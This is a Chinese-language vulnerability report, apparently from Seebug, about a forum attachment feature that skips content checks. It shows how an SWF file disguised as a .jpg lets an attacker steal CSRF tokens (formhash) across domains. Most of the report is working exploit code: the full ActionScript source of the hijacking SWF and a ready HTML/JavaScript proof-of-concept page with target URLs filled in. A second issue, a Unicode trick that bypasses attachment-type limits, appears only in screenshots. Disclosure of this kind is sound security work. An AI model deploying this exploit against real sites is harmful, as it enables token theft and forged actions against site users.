### 简要描述:
两个问题合在一起提交了
### 详细说明:
#1 跨域数据劫持(csrf token formhash盗取)
下载远程附件功能不会对文件内容(文件格式)进行检测,导致可以上传恶意的 swf 文件(扩展名仍为图片扩展名),进而进行跨域数据劫持:
伪造图片CrossDomainDataHijack.jpg相关代码:
```
package com.powerflasher.SampleApp {
import flash.external.ExternalInterface;
import flash.display.Sprite;
import flash.display.Sprite;
import flash.events.Event;
import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.text.TextField;
import flash.text.TextFieldAutoSize;
import flash.xml.*;
import flash.events.IOErrorEvent;
import flash.events.*;
import flash.net.*;
/**
* @author User
*/
/**
 * Proof-of-concept SWF from the report. It is uploaded under an image
 * extension (the report's CrossDomainDataHijack.jpg) and, once the plugin
 * treats the bytes as Flash, runs with the origin of the site that hosts it.
 * It fetches the URL given in the `input` FlashVar and hands the response
 * body to the embedding page's JavaScript through ExternalInterface.
 *
 * Defender note: the site-side fix is to inspect uploaded bytes rather than
 * the extension (the report states the remote-attachment feature does no
 * content check), and to serve user uploads from a separate origin or with
 * Content-Disposition: attachment so a sniffed SWF cannot act as the site.
 */
public class CrossDomainDataHijack extends Sprite {
// Loader that performs the fetch; kept as a field so it outlives the
// constructor while the handlers registered below are still pending.
private var loader:URLLoader;
/**
 * Constructor: wires up every URLLoader event, reads the target URL from the
 * `input` FlashVar (the POC page supplies it via "?input=" on the SWF URL)
 * and starts the request. A synchronous load() failure is reported to
 * JavaScript here; asynchronous failures arrive through the error handlers.
 */
public function CrossDomainDataHijack() {
loader = new URLLoader();
configureListeners(loader);
// `input` is set by the embedding page; no validation is done on it.
var target:String = root.loaderInfo.parameters.input;
var request:URLRequest = new URLRequest(target);
try {
loader.load(request);
} catch (error:Error) {
sendDatatoJS("Unable to load requested document; Error: " + error.getStackTrace());
}
}
/**
 * Registers one handler per URLLoader lifecycle event on the given
 * dispatcher, so every stage (open, progress, HTTP status, completion and
 * both error kinds) is echoed to the page's JavaScript.
 */
private function configureListeners(dispatcher:IEventDispatcher):void {
dispatcher.addEventListener(Event.COMPLETE, completeHandler);
dispatcher.addEventListener(Event.OPEN, openHandler);
dispatcher.addEventListener(ProgressEvent.PROGRESS, progressHandler);
dispatcher.addEventListener(SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler);
dispatcher.addEventListener(HTTPStatusEvent.HTTP_STATUS, httpStatusHandler);
dispatcher.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHandler);
}
// Fired when the response body has fully arrived; loader.data is the whole
// response text, which is what reaches the page's sendToJavaScript().
// (The local `loader` shadows the field of the same name.)
private function completeHandler(event:Event):void {
var loader:URLLoader = URLLoader(event.target);
//trace("completeHandler: " + loader.data);
sendDatatoJS("completeHandler: " + loader.data);
}
// Diagnostic: the connection was opened.
private function openHandler(event:Event):void {
//trace("openHandler: " + event);
sendDatatoJS("openHandler: " + event);
}
// Diagnostic: download progress in bytes.
private function progressHandler(event:ProgressEvent):void {
//trace("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);
sendDatatoJS("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);
}
// Fired when the Flash sandbox refuses the request. If this fires instead of
// completeHandler, the SWF was presumably not treated as same-origin with the
// target — the outcome a defender wants to see after fixing the upload check.
private function securityErrorHandler(event:SecurityErrorEvent):void {
//trace("securityErrorHandler: " + event);
sendDatatoJS("securityErrorHandler: " + event);
}
// Diagnostic: HTTP status code of the response.
private function httpStatusHandler(event:HTTPStatusEvent):void {
//trace("httpStatusHandler: " + event);
sendDatatoJS("httpStatusHandler: " + event);
}
// Diagnostic: network / I/O failure.
private function ioErrorHandler(event:IOErrorEvent):void {
//trace("ioErrorHandler: " + event);
sendDatatoJS("ioErrorHandler: " + event);
}
// Bridge to the host page: trace() for the Flash debugger, then a call to the
// page's global sendToJavaScript(data). This callback only works when the
// embed permits script access (the POC page sets AllowScriptAccess=always).
private function sendDatatoJS(data:String):void{
trace(data);
ExternalInterface.call("sendToJavaScript", data);
}
}
}
```
POC页面相关代码:
```
><head>
<title>steal CSRF tokens by upload a fake image(flash) file on target site</title>
</head><body><h1 align="center">steal CSRF tokens by upload a fake image(flash) file on targe site</h1>
<script>
// Callback invoked by the SWF via ExternalInterface.call("sendToJavaScript", ...).
// Appends the received string to #HijackedData as a text node (so it is not
// interpreted as markup), then adds a line break.
// Note: `innerHTML += '<br/>'` re-serialises and re-parses the whole div on
// every call; the earlier appendChild of a text node stays as text.
function sendToJavaScript(strData){
var theDiv = document.getElementById("HijackedData");
var content = document.createTextNode(strData);
theDiv.appendChild(content);
theDiv.innerHTML += '<br/>'
//alert(strData);
}
// Builds the SWF URL from the two text inputs: the uploaded file's URL plus
// "?input=<target page>", which the SWF reads as the FlashVar `input`. The
// existing <object id="myObject"> is removed and a fresh one inserted so the
// SWF is (re)loaded with the new parameters. AllowScriptAccess=always is set
// both as an attribute and as a <param>; that is what allows the SWF to call
// back into this page through ExternalInterface.
// Note: the target value is concatenated without encodeURIComponent, so a
// target URL containing '&' or '#' would not survive intact.
// Defender note: the precondition for this page to show anything is a file on
// the target origin whose bytes are an SWF (signature "FWS"/"CWS") despite its
// image extension; checking uploaded content rather than extension removes it.
function refreshObjectTag(){
var newURL = document.getElementById('flashFile').value +"?input="+document.getElementById('target').value;
var newObjectTag = createSwfObject(newURL,{id: 'myObject', width: 100, height: 100, 'AllowScriptAccess': 'always'},{'AllowScriptAccess': 'always'})
document.body.removeChild(document.getElementById("myObject"));
document.body.appendChild(newObjectTag);
}
// Creates an <object> element for the SWF at `src` by assembling its markup
// as a string and parsing it inside a detached <div>. Where window.ActiveXObject
// exists (older IE) the Flash classid is used and the SWF URL goes into a
// <param name="movie">; elsewhere it goes into the `data` attribute.
// `attributes` and `parameters` are optional; when given they are mutated in
// place (type, classid/data and movie are added to the caller's objects).
// Note: attribute and param values are inserted unescaped (no quoting of '"',
// '<' or '&'); this is only acceptable because the caller controls them.
var createSwfObject = function(src, attributes, parameters) {
var i, html, div, obj, attr = attributes || {}, param = parameters || {};
attr.type = 'application/x-shockwave-flash';
if (window.ActiveXObject) {
attr.classid = 'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000';
param.movie = src;
}
else {
attr.data = src;
}
html = '<object';
for (i in attr) {
html += ' ' + i + '="' + attr[i] + '"';
}
html += '>';
for (i in param) {
html += '<param name="' + i + '" value="' + param[i] + '" />';
}
html += '</object>';
div = document.createElement('div');
div.innerHTML = html;
// Detach the parsed element from the scratch div before handing it back.
obj = div.firstChild;
div.removeChild(obj);
return obj;
};
</script>
File: <input id="flashFile" size="100" value="http://x55.me/CrossDomainDataHijack.jpg" type="text">
Page: <input id="target" size="100" value="http://x55.me/csrf.php" type="text">
<input value="start to steal some CSRF tokens" onclick="refreshObjectTag()" type="button">
<div id="HijackedData"></div>
<object id="myObject"></object>
</body></html>
```
获取formhash截图:
[<img src="https://images.seebug.org/upload/201406/1714085039b57ad052dadecf7246713abf24953a.png" alt="123.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/1714085039b57ad052dadecf7246713abf24953a.png)
#2
绕过附件类型限制用到的是上次讲到的 Hacking with Unicode 里面的小 trick。这个算 BUG 吧,算不上安全漏洞,起码暂时我还没能把它联系到漏洞上面。可以选择性修复:
[<img src="https://images.seebug.org/upload/201406/17141236a7f9fe8f5b7f9ff395c026d06f5f84a7.png" alt="123333.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/17141236a7f9fe8f5b7f9ff395c026d06f5f84a7.png)
测试:
[<img src="https://images.seebug.org/upload/201406/17141550e070cd786288bfc9df2fb2666a06626b.png" alt="12444444.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/17141550e070cd786288bfc9df2fb2666a06626b.png)
成功绕过:
[<img src="https://images.seebug.org/upload/201406/17141607e933c6e17d1fcfc0de4512112fd6d443.png" alt="125555555.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/17141607e933c6e17d1fcfc0de4512112fd6d443.png)
### 漏洞证明:
证明如上